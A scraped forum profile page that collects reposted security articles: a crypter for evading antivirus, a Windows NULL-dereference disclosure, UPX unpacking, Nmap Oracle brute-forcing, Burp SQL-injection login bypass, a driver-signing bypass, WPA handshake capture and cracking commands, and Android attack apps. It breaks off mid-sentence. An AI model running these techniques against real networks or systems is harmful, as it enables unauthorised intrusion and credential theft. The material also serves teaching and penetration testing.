Jump to content

Nytro

Administrators
  • Posts

    18715
  • Joined

  • Last visited

  • Days Won

    701

Everything posted by Nytro

  1. From: rage <ragesploit () 0xrage com> Date: Wed, 21 May 2014 23:13:20 -0400 I've written and released a packer/crypter called rcrypt that might be fun for some of you to play around with. The latest public version is 1.4 although there is a functional 1.5 non public version currently in progress. The general summary is as follows: rcrypt is a Windows PE binary crypter (a type of packer) that makes use of timelock techniques to cause a delay in execution. This delay can cause analysis to fail on time constrained systems such as on disk scanners. rcrypt can pack exes and dll files. It bypasses KAV and many others. I'm always interested in feedback and suggestions/criticisms. There are many other features and functions as well! Released on my site: rcrypt v1.4 released | 0xrage Writeup also available: rcrypt packer writeup | 0xrage enjoy! - rage Sursa: Full Disclosure: rcrypt packer/crypter writeup and POC tool
  2. From: Tavis Ormandy <taviso () cmpxchg8b com> Date: Wed, 21 May 2014 11:57:31 -0700 Apparently I'm being lured into pointless discussions today, so here's another. As I'm sure everyone is aware, Microsoft introduced basic NULL page mitigations for Windows 8 (both x86 and x64), and even backported the mitigation to Vista+ (On x64 only). There are some weaknesses, but this is a topic for another time. Interestingly, on Windows 8 x86, there is an intentional exception, if an Administrator has installed the 16bit subsystem the mitigation is worthless because you can run your exploit in the context of NTVDM (simply use the technique I documented in CVE-2010-0232 Windows NT - User Mode to Ring 0 Escalation Vulnerability). An Administrator can do this either on-demand by running an 16bit program, e.g. C:\> debug Or using fondue to install it manually: C:\> fondue /enable-feature:ntvdm /hide-ux:all Let's look at an example of a NULL dereference. It's obvious from the code that win32k!GreSetPaletteEntries doesn't validate the MDCOBJA call succeeds in the HDC list traversal, resulting in a very clean NULL dereference. .text:001EAF49 lea esi, [ebp+var_2C] ; out pointer .text:001EAF4C call ??0MDCOBJA@@QAE () PAUHDC__@@@Z ; MDCOBJA::MDCOBJA(HDC__ *) .text:001EAF51 push 1 .text:001EAF53 mov edx, edi .text:001EAF55 call _GreGetObjectOwner () 8 ; GreGetObjectOwner(x,x) .text:001EAF5A mov esi, eax .text:001EAF5C call ds:__imp__PsGetCurrentProcessId () 0 ; PsGetCurrentProcessId() .text:001EAF62 and eax, 0FFFFFFFCh .text:001EAF65 cmp esi, eax .text:001EAF67 jnz short loc_1EAFBA .text:001EAF69 and [ebp+ms_exc.registration.TryLevel], 0 .text:001EAF6D mov eax, [ebp+var_2C] ; load pointer .text:001EAF70 mov ecx, [eax+38h] ; NULL dereference .text:001EAF73 mov eax, [ecx+4] Callers like GreIsRendering, GreSetDCOrg, GreGetBounds, etc, etc check correctly for comparison. This better code is from win32k!GreSetDCOrg: .text:00213DA2 lea esi, [ebp+var_C] ; out pointer .text:00213DA5 xor ebx, ebx .text:00213DA7 call ??0MDCOBJA@@QAE () PAUHDC__@@@Z ; MDCOBJA::MDCOBJA(HDC__ *) .text:00213DAC mov edi, [ebp+var_C] ; load result .text:00213DAF test edi, edi ; check for NULL .text:00213DB1 jz short loc_213E15 ; error This bug can be triggered with typical resource exhaustion patterns (see my exploit for CVE-2013-3660 for reference Windows NT - Windows 8 EPATHOBJ Local Ring 0 Exploit). However, I have also stumbled onto a Windows 8 specific technique that does not require resource exhaustion, using the (undocumented) Xferable object flag. See the attached code (the testcase is Windows 8+ on x86 specific, although the bug affects other versions and platforms). This seems exploitable on 32bit systems prior to Windows 8, but on Windows 8 it's only exploitable (ignoring mitigation failures) with NTVDM configured. It's my understanding that Microsoft no longer consider this a supported configuration, and are only interested in fixing NULL page mitigation bypasses. I'm not convinced this is a reasonable stance, what do other people think? Tavis. P.S. I think linux introduced it's mmap_min_addr mitigation to stable around 2007? Seven years lag, I guess that's the power of the SDL ;-) -- ------------------------------------- taviso () cmpxchg8b com | pgp encrypted mail preferred ------------------------------------------------------- Attachment: SetPalette.c Sursa: Full Disclosure: NULL page mitigations on Windows 8 x86
  3. Manual Unpacking of UPX using OllyDbg [TABLE] [TR] [TD=class: page_subheader]Introduction[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]In this tutorial, you will learn how to unpack any UPX packed Executable file using OllyDbg UPX is a free, portable, executable packer for several different executable formats. It achieves an excellent compression ratio and offers very fast decompression. [/TD] [/TR] [TR] [TD=align: center] [/TD] [/TR] [TR] [TD=align: center][/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD]Here we will do live debugging using OllyDbg to fully unpack and produce the original Executable FILE from the packed file. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Packing EXE using UPX[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]To start with, we need to pack sample EXE file with UPX. First you need to download latest UPX packer from UPX website and then use the following command to pack your sample EXE file.[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_code]upx -9 c:\sample.exe[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD]If you already have UPX packed binary file then proceed further. In such case make sure to use PEiD or 'RDG Packer Detector' to confirm if it is packed with UPX as shown in the screenshot below.[/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center][/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]UPX Unpacking Process[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=align: justify] Before we begin with unpacking exercise, lets try to understand the working of UPX. When you pack any Executable with UPX, all existing sections (text, data, rsrc etc) are compressed. Each of these sections are named as UPX0, UPX1 etc. Then it adds new code section at the end of file which will actually decompress all the packed sections at execution time. Here is what happens during the execution of UPX packed EXE file.. [/TD] [/TR] [TR] [TD] Execution starts from new OEP (from newly added code section at the end of file) First it saves the current Register Status using PUSHAD instruction All the Packed Sections are Unpacked in memory Resolve the import table of original executable file. Restore the original Register Status using POPAD instruction Finally Jumps to Original Entry point to begin the actual execution [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Manual Unpacking of UPX[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD]Here are the standard steps involved in any Unpacking operation Debug the EXE to find the real OEP (Original Entry Point) At OEP, Dump the fully Unpacked Program to Disk Fix the Import Table [/TD] [/TR] [TR] [TD=align: justify] Based on type and complexity of Packer, unpacking operation may vary in terms of time and difficulty. UPX is the basic Packer and serves as great example for anyone who wants to learn Unpacking. Here we will use OllyDbg to debug & unpack the UPX packed EXE file. Although you can use any debugger, OllyDbg is one of the best ring 3 debugger for Reverse Engineering with its useful plugins. Here is the screenshot of OllyDbg in action [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center][/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD]Lets start the unpacking operation[/TD] [/TR] [TR] [TD] Load the UPX packed EXE file into the OllyDbg Start tracing the EXE, until you encounter a PUSHAD instruction. Usually this is the first instruction or it will be present after first few instructions based on the UPX version. When you reach PUSHAD instruction, put the Hardware Breakpoint (type 'hr esp-4' at command bar) so as to stop at POPAD instruction. This will help us to stop the execution when the POPAD instruction is executed later on. Other way is to manually search for POPAD (Opcode 61) instruction and then set Breakpoint on it. Once you set up the breakpoint, continue the execution (press F9). Shortly, it will break on the instruction which is immediately after POPAD or on POPAD instruction based on the method you have chosen. Now start step by step tracing with F7 and soon you will encounter a JMP instruction which will take us to actual OEP in the original program. When you reach OEP, dump the whole program using OllyDmp plugin (use default settings). It will automatically fix all the Import table as well. That is it, you have just unpacked UPX !!! [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Fixing Import Table[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] In the current example, OllyDmp plugin will take care of fixing the Import table. However for most of the packers, we need to use advanced tool called ImpRec (Import Reconstructor). ImpREC is highly advanced tool used for fixing the import table. It provides multiple methods to trace the API functions as well as allow writing custom plugins. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=align: center][/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD]For interested users, here are simple instructions on how to fix Import Table using ImpRec.[/TD] [/TR] [TR] [TD] When you are at the OEP of the program, just dump the memory image of binary file using Ollydmp WITHOUT asking it to fix the Import table. Now launch the ImpREC tool and select the process that you are currently debugging. Then in the ImpREC, enter the actual OEP (enter only RVA, not a complete address). Next click on 'IAT Autosearch' button to automatically search for Import table. Now click on 'Get Imports' to retrieve all the imported functions. You will see all the import functions listed under their respective DLL names. If you find any import function which is invalid (marked as VALID: NO) then remove it by by right clicking on it and then from the popup menu, click on 'Delete Thunks'. Once all the import functions are identified, click on "Fix Dump" button in ImpREC and then select the previously dumped file from OllyDbg. Now run the final fixed executable to see if everything is alright. [/TD] [/TR] [TR] [TD]For advanced packers, you may have to use different methods in ImpRec and some times need to write your own custom plugin to resolve the import table functions. For more interesting details refer to our PESpin ImpRec plugin. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Video Demonstration[/TD] [/TR] [/TABLE] [TABLE] [TR] [TD]This video demonstration uses slightly different way to put a hardware breakpoint than described in the article. Also it uses ImpREC to fix import table which is useful while unpacking advanced packers. Here are the steps shown in video [/TD] [/TR] [TR] [TD] Load your EXE in Ollydbg Step Over (Shortcut-F8) PUSHAD instruction Next Go to ESP (right click and follow in DUMP Window) Put Hardware Read Breakpoint (Access) on first dword at ESP. (This is similar 'hr esp-4 at PUSHAD instruction as described earlier) Now Run EXE until we hit breakpoint (shortcut-F9) It will break right after POPAD instruction. You will see a JMP instruction few lines below the current instructions. Put breakpoint on JMP Run exe again until it stops at JMP instruction (shortcut-F9) Step Over JMP (Shortcut- F8) Now we are at OEP, Here just Dump Process using OllyDump without fixing Import table. Here we will use ImpREC to fix the import table as mentioned in 'Fixing Import Table' section. Finally after fixing import table, run the new unpacked EXE to make sure it is perfect ! [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]References[/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] UPX: Ultimate Packer for Executables. OllyDbg: Popular Ring 3 Debugger. ImpREC: Import Table Reconstruction Tool PESpin Plugin for ImpREC RDG Packer Detector PEid Packer Detector [/TD] [/TR] [/TABLE] Sursa: Manual Unpacking of UPX Packed Binary File - www.SecurityXploded.com
  4. Discovering Oracle Accounts With Nmap If we are conducting an infrastructure penetration test and we have discover an Oracle database during the information gathering stage then we can use Nmap to perform some checks that will help us to obtain potentially the accounts that exists on the database. These checks can be executed with two scripts that Nmap contains in his scripting engine.Specifically the scripts that we will need to use are the following: oracle-sid-brute oracle-brute Oracle databases are running on port 1521 so in most of the cases we can identify them just by checking if this port is open on our target host.The next step is to use the script oracle-sid-brute which will try to brute force common oracle SID’s.The next image is showing the use of this script and that has successfully identified that the SID is XE. Brute Forcing Oracle SID’s – Nmap Now that we know the SID of the Oracle database we can use the oracle-brute script to discover the valid accounts.by specifying the SID name Discovering Oracle Accounts Conclusion With these two scripts we can perform security audits against an Oracle database with Nmap.However the drawback as the above image indicates is that we can lock the accounts as the script doesn’t have a check about the number of tries that will execute in order to prevent the account lockout.From the other hand it is a very fast approach for detecting oracle accounts through Nmap during the information gathering. Sursa: Discovering Oracle Accounts With Nmap | Penetration Testing Lab
  5. SQL Injection Authentication Bypass With Burp Burp is a tool that can be used in every web application penetration test to perform a variety of activities and to automate tasks.As a penetration tester you might want to test some things automatically and effectively because this will reduce the amount of time that you will spend on specific checks and it will give you more time to focus on the tricky parts of your assessment.One of the checks that you must do in a web application that contains a login form is to examine whether or not this form is vulnerable to SQL injection and if it is to try to bypass it and to login as administrator. In order to bypass authentication in a form that is vulnerable to SQL injection vulnerability we will need to understand how the query has constructed and to append to this query the appropriate parameters.If we want to do a fast test before starting exploiting this manually we can use Burp intruder and a cheat sheet that has created for this purpose.Burp intruder will send HTTP requests by passing each parameter from this list to a specific position in the request.This method is going to be examined in this article and for the demonstration needs we will use the mutillidae as the target application which contains this vulnerability. The first thing that we have to do in this situation is of course to discover if the login form is vulnerable.We can simply insert a single ‘ on the username field and then we must watch for the response.If the application returns an error like the one in the image below then it is likely to be vulnerable. SQL Injection Error Then we must capture the HTTP request with Burp proxy and we should send this to Intruder.In the Intruder there are two things that we need to check.The first is the attack type and the second is the payload position.For the attack type the choice must be sniper because in this mode Burp Intruder will take a single input from a list that we will provide later and it will send this input on the position that we specify in the HTTP request (each input at a time).For the position we choose the field that is vulnerable (in this case the username). Burp Intruder – Attack Type and Position Next thing to do is to set the payloads.As a payload type for this attack a simple list will used.So in the payload options we have to load our .txt list. Burp Intruder – Setting up the payloads Now the attack is ready to be launched.Burp Intruder will start passing these parameters from the list to the payload position and from the payload position to the web application as an HTTP request.When this process finishes the successful payloads will have different status code as it can be seen from the next image. SQL Injection Bypass Authentication – Burp payloads Now we can go back to the application and to use one of the successful payloads in order to bypass the authentication and to login with admin privilleges to the application. Bypass Authentication by passing the correct payload Conclusion This was a simple tutorial that showed the major capabilities of Burp against web applications as we managed to logged into the application as admin.The cheat sheet about SQL injection authentication bypass that we used in this article has developed by Dr. Emin ?slam Tatl?If and all the credits goes to him.If you want to use the list or to expand it you can find it here. Sursa: SQL Injection Authentication Bypass With Burp | Penetration Testing Lab
  6. [h=1]Defeating Driver Singing Enforcement, Not That Much Hard![/h] November 4, 2012 These days everybody talks about Driver Signing Enforcement, and the ways we can bypass it. J00ru talked about the hard way, and I tell you about the easy and very long know way. What we need is just a Singed Vulnerable X64 Driver. As we know, loading drivers require administrator privilege, but these days a normal user with default UAC setting can silently achieve Admin privilege without popping up a UAC dialog. The driver I was talking about is DCR from DriveCrypt. The X64 version is singed and is vulnerable to a write4 bug. the latest version is not anymore vulnerable but this version still has a valid signature and that’s enough. I think it’s obvious that you can make the whole process of escalating privilege from normal user to Admin for loading vulnerable drive ( silently with one of UAC bypass methods) and exploitation pragmatically automatic. You can find vulnerable version of drive along the exploit at “DriveCrypt\x64\Release“. Sursa: Defeating Driver Singing Enforcement, Not That Much Hard! | REP RET
  7. Troopers 14 - Easy Ways To Bypass Anti-Virus Systems - Attila Marosi Description: All IT security professionals know that antivirus systems can be avoided. But few of them knows that it is very easy to do. (If it is easy to do, its impact is huge!) In this presentation I will, on the spot, fully bypass several antivirus systems using basic techniques! I will bypass: signatures detection, emulation/virtualization, sandboxing, firewalls. How much time (development) is needed for it, for this result? Not more than 15 hours without a cent of investment! If I could do this, anyone can do this… so I think we have to focus to this problem. Using these easy techniques I can create a ‘dropper’ that can deliver any kind of Metasploit (or anything else) shellcode and bypass several well-known antivirus in real-life and full bypass the VirusTotal.com detection with a detection rate in 0. In my presentation I use 6 virtual machines and 9 real-time demos. Resulting the audience always have a big fun and surprise when they see the most well-know systems to fail – and the challenges what the AVs cannot solved are ridiculously simple and old. So the IT professionals might think too much about the systems which they rely on and which cost so much. Bypassed AntiVirus Systems: F-Secure, AVG, NOD32 6 and 7, !avast, Kaspersky, Trend Micro, McAfee… Educational value of the topic: We look at how the virus writers develop their codes. We will develop a puzzle which may distract the AV virtualization engine to avoid the detection. We will develop a code to encrypt/decypt our malicious shellcode. We will look at which built-in Windows functions helps the attacker to inject malicious code to a viction process and we try it. (We will use the iexplorer.exe to bypass the firewall.) We will look at what solutions are often used to avoid the sandbox. Learn the difference between the metamorphous and polymorphous code. I wrote a python script which can create a metamorphous version from a byte code. We will test it in realtime and it will be able to seen, that it is a real challenge for the AVs. BIO: Attila Marosi has always been working in information security field since he started working. As a lieutenant of active duty he worked for years on special information security tasks occuring within the SSNS. Newly he was transferred to the just established GovCERT-Hungary, wich is an additional national level in the internationally known system of CERT offices. He has several international certificates such as CEH, ECSA, OSCP, OSCE. During his free time he also read lections and does some teaching on different levels; on the top of them for white hat hackers. He has presented at many security conferences including Hacker Halted, DeepSEC and Ethical Hacking. For More Information please visit : - https://www.troopers.de Sursa: Troopers 14 - Easy Ways To Bypass Anti-Virus Systems - Attila Marosi
      • 1
      • Upvote
  8. How To Crack A Wpa/Wpa2 Wireless Network Description: In this video i will show you how to crack a WPA/WPA2 Wireless network. We will need a Kali Linux and a Compatible Wireless card that supports Injection and Promiscuous mode. For more information on Promiscuous mode check out: Promiscuous mode - Wikipedia, the free encyclopedia Recommended Wireless card is a Alfa Network AWUS036H Getting started we need to put our wireless card into Monitor Mode to do that lets open a Terminal and type in: airmon-ng start wlan0 Next we need to find the network we wanna the password for First we need to Capture the 4-Way Handshake! Lets open a new Terminal and this time lets time in: airodump-ng mon0 Hopefully we should start to see networks showing up find the network you wanna crack hold CTRL+C tp stop airodump-ng Alright so assuming you found the network your going to wanna crack we need to get the 4-way handshake now! In the Terminal we need to type in: airodump-ng -c 1 --bssid 88:F7:C7:3A:D9:72 -w test mon0 change 88:F7:C7:3A:D9:72 to the target network you're trying to crack. Press enter and we should now be watching just that network! To get the handshake we must Deauthenticate a device or client already connected! If nothing shows up under STATION then we must wait till a wireless device shows up under their otherwise we can't get the handshake. Basically a waiting game till a wireless device is connected! Assuming you see a device listed under STATION we can then send a deauthentication using aireplay-ng Lets open a new Terminal and type in: aireplay-ng -0 1 -a 88:F7:C7:3A:D9:72 -c D8:50:E6:84:6C:74 mon0 Change 88:F7:C7:3A:D9:72 to the BSSID of the target network change D8:50:E6:84:6C:74 to the victims mac address under STATION. Once we get the Handshake its time to give it a try on cracking it! First you're going to need a wordlist so happy hunting! Their are tons of them out their some might work some might not! This video i have added my own password to a wordlist to make this an ethical video. Got you're wordlist? Lets move on to the next step! CRACKING! Open a Terminal and type in: aircrack-ng -w /path/to/wordlist/list.txt test-01.cap Assuming you didn't try using the same name ex; test more then once you should see a bunch of things in /root/ called test-01.cap, test-02.cap ect... Press enter and happy cracking good luck likely you have a better chance of getting hit by lighting on a nice day then getting the password. I recommend you try some online WPA cracking services for a better out come. Some sites like https://www.cloudcracker.com/ Charge $17 USD to try and crack it for you! Be sure to check out Matthew H Knight – Internet Security Professional Sursa: How To Crack A Wpa/Wpa2 Wireless Network
  9. Windows 7 Security Features Windows 7 is an Operating System developed and released by Microsoft in 2009. It was designed to be a successor to the Windows Vista range of operating systems. Windows 7 builds upon the features and design philosophies of Windows Vista and adds several enhancements along the way. Windows 7 primarily targets Home/Office users. It was the first Windows operating system to support the 64 bit Intel architecture. Design wise, Windows 7 is very similar to its predecessor Widows Vista, however it does have several enhancements such as Libraries, Jump Lists, etc. Security in Windows Windows-based operating systems have always been plagued with a host of security flaws and vulnerabilities, this is mainly because the systems were not designed with secure computing in mind. They are also a popular target for hackers due to these flaws. In today’s increasingly connected world we cannot allow our systems to be compromised without dire consequences. Windows 7 has tried to address these issues by following a Secure Development Life Cycle (SDLC), i.e. developers enforced a strict code review of all new code and they performed refactoring and code review of older OS code. Several of the major security improvements are given below in greater detail. 1. Date Execution Prevention (DEP) During the execution of a process, it will contain several memory locations that do not contain executable code. Attackers use these sections to initiate code injection attacks. After arbitrary code has been inserted, they can carry out attacks such as buffer overflows. Data Execution Prevention is a security technique that is used to prevent the execution of code from such data pages. This is done by marking data pages as non-executable. This makes it harder for code to be run in those memory locations. DEP is intended to be used with other mechanisms such as ASLR and SEHOP. When used together, it makes it very difficult for attacks to exploit the application using memory attacks. DEP support, though present in Windows 7, is opt-in, i.e. it is not enabled by default, but users are encouraged to enable DEP support. DEP can be enabled system wide or on a per application basis. This is configured by the system administrator. DEP types There are two DEP implementations: Hardware enforced DEP Software enforced DEP Hardware enforced DEP marks all memory locations as non-executable by default unless the location contains executable code explicitly. This helps prevent attacks that try to insert code from non-executable memory locations. Hardware DEP makes use of processor hardware to mark memory as non-executable, this is done by setting an attribute at the specified memory location. Hardware enforced DEP requires the system to be using a DEP compatible processor. Both AMD and Intel have both released processors with DEP support. AMD based processors make use of the NX bit to signify non-executable sections of memory. Intel based processors make use of the XD (Execute disable) bit to signify the same. Software enforced DEP Software based DEP is less complex than its hardware dependent variant, it also has limited functionality. Software based DEP will run on any type of processor that can run Windows 7. It can protect only a limited number of system binaries. Software based DEP can help defend against attacks that make use of the exception handling mechanism in Windows 7. DEP in other Operating Systems DEP is found in other operating systems as well, however they mostly make use of hardware enforced DEP technologies. This varies according to the processor used. RedHat/CentOS Linux supports DEP through the ExecShield tool. It is enabled by default. Sun Solaris supports hardware enforced DEP on NX/XD enabled x86 systems. This setting must be enabled. Apple Mac OS X supports DEP on Intel processors using the XD bit, it is enabled by default. Android 2.3 and above support DEP FreeBSD has supported DEP from version 5.3 onwards OpenBSD supports DEP through a custom implementation called W^X which can be used to mark pages as non-executable by default. W^X makes use of NX bit for its implantation support for XD bit is still forthcoming. W^X has been available from OpenBSD version 3.3 onwards. 2. Address Space Layout Randomization (ASLR) Address space layout randomization is a technique to increase security from common memory based attacks such as buffer overflows and stack smashing. Older versions of Windows essential system processes often used predictable memory locations for their execution. This made it much easier for attackers to find critical components of the process, including the program stack and heap. These addresses can then be used to launch buffer overflow attacks. To overcome this problem, ASLR was devised. ASLR randomizes several sections of the program, such as the stack, heap, libraries, etc. This makes memory addresses much harder to predict. Coupling ASLR with DEP makes it extremely difficult to carry out memory based attacks. In order to use ASLR, programs must be compiled using the ASLR flag, only then will randomization occur during program runtime. Windows 7 completely supports ASLR based applications and libraries. This support will be included in all Windows systems from Windows Vista onwards. ASLR in other Operating Systems ASLR is not restricted to Windows alone, it is found in other Operating systems as well. Linux supports a weaker form of ASLR, but it is present by default. OpenBSD has supported ASLR by default since its inception. MacOSX supports memory randomization by default for system libraries and applications that have been compiled with ASLR support. FreeBSD does not support ASLR fully as of yet, however they are in the process of developing it. DragonFly BSD supports ASLR it is based on the OpenBSD implementation. Android 4.0 (Ice Cream Sandwich) supports ASLR to protect memory system and third party applications from memory exploits. 3. Structured Exception Handler Overwrite Protection (SEHOP) Structured Exception Handler Overwrite Protection (SEHOP) is a technique used to prevent malicious users from exploiting Structured Exception Handler (SEH) overwrites. The SEH overwrite exploit was first demonstrated in Windows XP, since then it has become one of the most popular exploits in the hacker arsenal. Several exploit frameworks including Metasploit make use of SEH overwrite techniques to execute code remotely. SEH works by subverting the 32 bit exception mechanism provided by the Microsoft operating system. SEH exploits are generally carried out by using stack-based buffer overflow attacks to overwrite an exception registration record that has been stored in the thread’s stack. The exception registration record consists of two records, the next pointer and the exception handler, also called the exception dispatcher. The attacker will try to overwrite the exception dispatcher and force an exception. There are two methods to stop SEH exploits. The first technique requires the application to compiled using the /SAFESEH flag during the linking phase. This may not be feasible, because it requires the recompilation of the entire application. The second method is used by SEHOP. Here dynamic checks are carried out to ensure that a thread’s exception handler list is not corrupt before actually calling the exception handler. SEHOP is enabled by default on Windows 7 and Windows 8 operating systems. It can be disabled if required through the modification of registry keys. 4. User Account Control (UAC) User account control is a security feature first introduced in Windows Vista to limit administrative privileges only to authorized users. If an application tries to perform an administrative action, the user must authenticate before the action is carried out. This is useful, as it prevents malicious files from executing actions with administrative privileges. UAC works by allowing temporary administrative access to the concerned user if he/she is able to authenticate themselves during the UAC prompt. There are several actions that can trigger a UAC alert. Some of them are listed below: Running an Application as an Administrator Changes to system-wide settings or to files in %SystemRoot% or %ProgramFiles% Installing and uninstalling applications Installing device drivers Installing ActiveX controls Changing settings for Windows Firewall Changing UAC settings Configuring Windows Update Adding or removing user accounts Changing a user’s account type Configuring Parental Controls Running Task Scheduler Restoring backed-up system files Viewing or changing another user’s folders and files UAC also introduces the concept of Secure Desktop, wherein the entire desktop is dimmed during a UAC prompt, forcing the user to only interact with the elevation window. Normal applications cannot interact with the secure desktop. This prevents spoofing attacks. UAC is enabled by default, but can be disabled from the Control Panel, but it is not advisable to do so. UAC is similar in functionality to the sudo command found in UNIX based systems. 5. DNS System Security Enhancements (DNSSEC) The DNS System Security Enhancements is a set of specifications used to secure information provided by the DNS system. The specification was devised by the IETF (Internet Engineering Task Force). DNSSEC support was first introduced to Windows 7 and Windows Server 2008 R2. DNSSEC works through the use of extensions to improve upon the shortcomings of the DNS system to provide DNS clients with certain features such as: Origin authentication of data Authentication Data integrity The original DNS system was not designed with security in mind, this has led to heavy exploitation of DNS systems. DNSSEC tries to add security without sacrificing backward compatibility. DNSSEC makes use of public key cryptography to digitally sign records for DNS lookup. The correct DNS record is authenticated using a chain of trust, which works with a set of verified keys from the DNS root zone, which is the trusted third party. DNSSEC in other Operating Systems DNSSEC is supported in many other operating systems. BIND, the most popular DNS name server, supports the latest version of the DNSSEC protocol The Google public DNS server fully supports the DNSSEC protocol. 6. Bitlocker Bitlocker is a Windows security feature that was first introduced for Windows Vista and then further enhanced for Windows 7. It provides full disk encryption capabilities for Windows 7, it is included as part of the operating system itself, and it does not require any third party plugins to function. It is only available for the Enterprise and Ultimate editions of Windows 7. Bitlocker provides logical volume encryption, i.e. the drive to be encrypted must be partitioned into logical volumes for Bitlocker to work. Bitlocker requires at least two NTFS volumes, one for the OS itself (typically called C Drive) and another boot partition with a minimum size of 100MB. The boot partition is not encrypted by Bitlocker, as it is required for the system bootstrap process. Bitlocker may be used in conjunction with the encrypting file system to provide increased security. The encrypting file system or EFS is another security feature for Microsoft Windows that was introduced for NTFS version 3.0 and above. It is supported on all Windows systems from Windows 2000 onwards. EFS provides filesystem level encryption for the user while the operating system is running. This provides an additional layer of protection. Both Bitlocker and EFS make use of 256 bit AES in CBC mode for its encryption needs. EFS also has several other algorithms to choose from. Full disk encryption in other Operating Systems Full disk encryption is not a new concept and there are many alternatives for it. Full disk encryption is supported by different operating systems in varying degrees. Linux supports two alternatives for full disk encryption, eCryptfs and dm-crypt. eCryptfs provides stacked file system level encryption. This is similar to EFS on Windows. FreeBSD provides full disk encryption through the GBDE (GEOM based Disk Encryption) framework. GBDE only supports 128 bit AES however. FreeBSD also has another full disk encryption framework called GELI. GELI has support for many cryptographic algorithms such as AES, Blowfish, Triple DES, etc. 7. Improved Cryptography Windows 7 features several enhancements in its Cryptographic subsystem. There are several new cryptographic algorithms to choose from, including Blowfish, AES, Triple DES, etc. Windows 7 also includes support for Elliptic curve cryptography. The Kerberos protocol in Windows 7 has been updated to use AES encryption over DES. The Windows LAN manager has been updated to use NTLM2 hashes by default instead of SHA1 or MD5 hashing algorithms. 8. Windows Firewall/Defender Windows 7 includes a new and improved Windows Defender. Windows Defender is an anti-spyware and anti adware software that is included as part of the operating system itself. Windows Defender can be updated like an Anti-virus solution. Windows Firewall is a host based firewall that is included with each copy of Windows. It has been extensively overhauled in Windows 7. It now provides full support for IPsec. Windows firewall also makes use of a new framework called Windows Filtering Platform (WFP). WFP provides improved packet filtering capabilities that are integrated into the TCP/IP stack. 9. Improved Authentication Mechanisms Better authentication support was introduced in Windows 7. This includes support for Biometric access and Smart cards. User accounts can be authenticated using two-factor authentication, i.e. a combination of password and smart card. The single sign-on feature has also been introduced. This can be used with smart-cards which can also be integrated with several other security services such as EFS. Winlogon has been upgraded from GINA (Graphical Identification and Authentication) to the Credential provider library. It also supports NTLM2 by default for generating password hashes. This is a significant improvement from the deprecated NTLM hashing algorithm. Winlogon is the interactive login manager for Windows based systems. References Address space layout randomization - Wikipedia, the free encyclopedia Security and safety features new to Windows Vista - Wikipedia, the free encyclopedia Data Execution Prevention - Wikipedia, the free encyclopedia Windows 7 - Wikipedia, the free encyclopedia Encrypting File System - Wikipedia, the free encyclopedia Domain Name System Security Extensions - Wikipedia, the free encyclopedia Managing Risk Preventing the Exploitation of Structured Exception Handler (SEH) Overwrites with SEHOP - Security Research & Defense - Site Home - TechNet Blogs How Mac OS X Implements Password Authentication, Part 2 - Dave Dribin's Blog https://support.microsoft.com/kb/875352 http://support.microsoft.com/kb/956607 Advanced Windows Security: Activating SEHOP | gHacks Technology News By Albert Fruz|May 23rd, 2014 Sursa: Windows 7 Security Features - InfoSec Institute
  10. Penetration Testing Apps for Android Devices Introduction According to recent research, the amount of mobile phone users is larger than PC users. At the same time, the number of people who own Android phones is increasing rapidly. Android phones bring people a lot of convenience, in that it helps people do as much work as they can do on a computer, with no limitation by the location. Android has become a need rather than luxury these days, and its popularity has increased rapidly among available smart phones. There are lots of OS which are available these days, but among all of them, Android is the best one, as it can be handled easily and also it is very easy to implement because of its open source nature. Android App Development has become an important tool for developing mobile applications. The Software Development Kit facilitated by Android assists developers to start developing and working on the applications instantaneously, so the app can be implemented faster. Now that penetration testing is possible by using the Android platform, there will be no need to carry your system to various locations to carry out your pen test. As we all know, penetration testing involves much involvement of the person into their system, but by using your Android phone, you can perform it at any location in the best way you can. The following are the Android applications that you can use for penetration testing. 1. Networking Tools Port Scanner: this tool lets you scan ports on a remote host via its IP or domain name so you can know which ports are open on the host. It supports 3G, protocol recognition, and many other features. Fing: Fing is a professional App for network analysis. A simple and intuitive interface helps you evaluate security levels, detect intruders and resolve network issues. It helps you to find out which devices are connected to your Wi-Fi network, in just a few seconds. Network Discovery: Network Discovery is similar to Fing. It is used for device discovery and works as a port scanner for a local area network. tPacketCapture: tPacketCapture does packet capturing without using any root permissions. tPacketCapture uses VpnService provided by Android OS. Captured data are saved as a PCAP file format in the external storage. Droidsheep: Droidsheep is written by Andrew Koch. It works as a session hijacker for non-encrypted sites and allows you to save cookies files/sessions for later analysis. It is no longer available from the developer’s site i.e. droidsheep.de. FaceNiff: FaceNiff is an app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when WiFi is not using EAP, but it should work over any private network. 2. DOS LOIC: LOIC is a tool for network stress testing a denial-of-service attack application. LOIC performs a denial-of-service (DoS) attack (or when used by multiple individuals, a DDoS attack) on a target site by flooding the 